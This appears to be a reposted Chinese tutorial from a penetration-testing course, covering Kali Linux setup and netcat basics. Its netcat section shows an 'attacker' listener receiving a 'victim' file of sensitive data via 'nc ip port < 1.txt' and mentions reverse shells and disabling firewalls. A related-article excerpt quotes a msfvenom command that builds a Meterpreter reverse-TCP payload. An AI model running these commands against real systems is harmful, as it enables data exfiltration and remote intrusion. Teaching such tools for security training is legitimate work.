13.WEB渗透测试--Kali Linux(一)

这篇具有很好参考价值的文章主要介绍了13.WEB渗透测试--Kali Linux(一)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

免责声明:内容仅供学习参考,请合法利用知识,禁止进行违法犯罪活动!

内容参考于: 易锦网校会员专享课

上一个内容:12.WEB渗透测试-Linux系统管理、安全加固(下)-CSDN博客

kali由 Offensive Security 开发并重写 BackTrack,Kali Linux 发行版在我们用于黑客目的的最佳操作系统列表中名列前茅。这个基于 Debian 的操作系统附带了 600 多个预装的笔测试工具,使您的安全工具箱更加丰富。这些通用工具会定期更新,并适用于 ARM 和 VMware 等不同平台。对于司法鉴定工作,此顶级黑客操作系统具有实时启动功能,该功能为漏洞检测提供了理想的环境。

官方网站:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

Kali Linux是基于Debian的Linux发行版,Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng 超过300个渗透测试工具。安全软件分为:信息收集、脆弱性分析、开发工具、无线攻击、取证工具、Web应用程序、压力测试、嗅探和欺骗、密码攻击、维护访问权限、硬件攻击、逆向工程、硬件攻击。

1.kali的优化

kali配置参考文档:kali Linux的设置和优化(双系统)_kailyouhua-CSDN博客

kali设置中文参考:kali linux设置中文方法 汉化教程-阿里云开发者社区

打开系统是英文界面,打开命令行

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

kali切换root用户:

sudo su

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

更改镜像源:

/etc/apt/sources.list 输入vi /etc/apt/sources.list进入编辑界面后输入国内镜像地址,并用#把原地址标注掉

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

中科大:deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

deb-src Index of /kali/ kali-rolling main non-free contrib

阿里云: deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

清华大学:deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

更新软件数据库:

sudo apt-get update

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

更新软件:

sudo apt-get upgrade

更新过程中一直选择yes

出现{ok}需要点击Tab键选中后才能按回车,不然会没有反应

更新完成显示界面

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

设置语言包:

sudo dpkg-reconfigure locales

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

注意:只选择一种语言要是不小心多选上了,可以按空格取消,选中*号的语言后摁tab后回车

修改缩放比例:hidp

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

2.netcat简介与使用

NC(netcat)被称为网络工具中的瑞士军刀,体积小巧,但功能强大。Nc主要功能,Nc可以在两台设备上面相互交互,即侦听模式/传

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

快速查看ip指令:

ip a

攻击者: nc -lnvp 8888

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

受害者: nc 攻击者ip 攻击者开放的端口号

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

效果演示:

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

 文章来源地址https://www.toymoban.com/news/detail-839560.html

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

断开连接:

ctrl+c

注意:两台机器不在同一个局域网内通信需要使用反弹shell 两台机器在同一个局域网无法通信需要关闭防火墙

service firewalld status 查看防火墙状态 sudo systemctl stop firewalld 关闭防火墙 sudo systemctl start firewalld 开启防火墙 sudo systemctl disable firewalld 永久关闭

传输文件内容:受害者将自己本地的1.txt发送到攻击者的1.txt里面,包含敏感信息的文件我们直接发送回来 攻击者(服务端;接收):nc -lvp 端口号 > 1.txt加n更详细

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

受害者(客户端;发送):nc ip地址 端口号 < 1.txt

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

攻击者的文件名可以随便起,受害者这边必须得有这个文件才能发送

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客

 

13.WEB渗透测试--Kali Linux(一),WEB渗透测试,网络安全,渗透,黑客


 

 

到了这里,关于13.WEB渗透测试--Kali Linux(一)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全--Kali渗透Windows

    这里我们学习使用Kali攻击机来渗透Windows,这里使用的是msfvenom木马来进行渗透。 命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe -o payload.exe 这里说明一下,-p 是指使用的工具模块,lhost是本机的IP地址,lport是本机的端口, -f 是指生成什么样的文件,简称指定

    2024年02月05日
    浏览(35)
  • 使用 Kali Linux 进行 Web 渗透测试

    在Web渗透中,信息就是力量、就是安全。因此,我们总是首先收集尽可能多的有关目标的信息——因为这可能会告诉我们实施攻击的最佳方式。 一台计算机(同一IP)上可以安装多个网站。如果您无法进入目标,请尝试侵入另一个网站。获取同一 IP 上的网站(Robtex 除外)的

    2024年01月23日
    浏览(43)
  • 网络安全kali web安全 Kali之msf简单的漏洞利用

    靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。 ​针对这个服务,我们就可

    2024年02月09日
    浏览(32)
  • 网络安全渗透测试实验一

    理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);

    2023年04月26日
    浏览(33)
  • 网络安全入门 5 天速成教程_ WEB 安全渗透攻防技术

    前言 随着 Web 技术发展越来越成熟,而非 Web 服务越来越少的暴露在互联网上,现在互联网安全主要指的是 Web 安全。 为了自身不“裸奔”在大数据里,渐渐开始学习 Web 安全,在学习 Web 安全的过程中,发现很大一部分知识点都相对零散,如果没有相对清晰 的脉络作为参考,

    2024年04月23日
    浏览(32)
  • 【网络安全】渗透测试之木马免杀

    博主昵称:跳楼梯企鹅 博主主页面链接: 博主主页传送门 博主专栏页面连接:

    2024年02月02日
    浏览(30)
  • 智能网联汽车网络安全测试:渗透测试,模糊测试详细讲解

    车内网络系统架构 随着智能网联汽车电子系统的复杂化,电子电气架构( Electrical/Electronic Architecture, EEA )由分布式向集中式架构演进,如图 2.1 所示。 在汽车 EEA 演进的同时,为了满足不同复杂程度的汽车功能对于通信性能的需求,车内总线协议也在不断发展。CAN 总线协

    2024年01月23日
    浏览(32)
  • 网络安全渗透测试的八个步骤

    ​一、明确目标 ​1.确定范围:测试目标的范畴、ip、网站域名、内外网、检测帐户。 2.确定标准:能渗入到何种程度,所花费的时间、能不能改动提交、能不能漏洞利用、这些。 3.确定要求:web应用的漏洞、业务逻辑漏洞、工作人员管理权限管理漏洞、这些。 ​二、信息收

    2024年02月04日
    浏览(32)
  • 记一次网络安全渗透测试实战指南

    网址已无法访问,就不贴了 可以使用Fofa,火线,zoomeye,searchcode.com等爬取相关的资产,重点关注一些有漏洞暴露的框架和服务例如:泛微,PHP,Tomca,后台,weblogic等等。之后就主要分三步: 指纹识别、漏洞验证、漏洞复现。 指纹识别很好理解,我们要拿历史漏洞怼它,首

    2024年02月08日
    浏览(39)
  • 网络安全从业人员应该如何提升自身的web渗透能力?

    前言 web 渗透这个东西学起来如果没有头绪和路线的话,是非常烧脑的。 理清 web 渗透学习思路,把自己的学习方案和需要学习的点全部整理,你会发现突然渗透思路就有点眉目了。 程序员之间流行一个词,叫 35 岁危机,,意思就是说 35 岁是个坎,容易被淘汰。 那么安全行

    2023年04月09日
    浏览(92)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包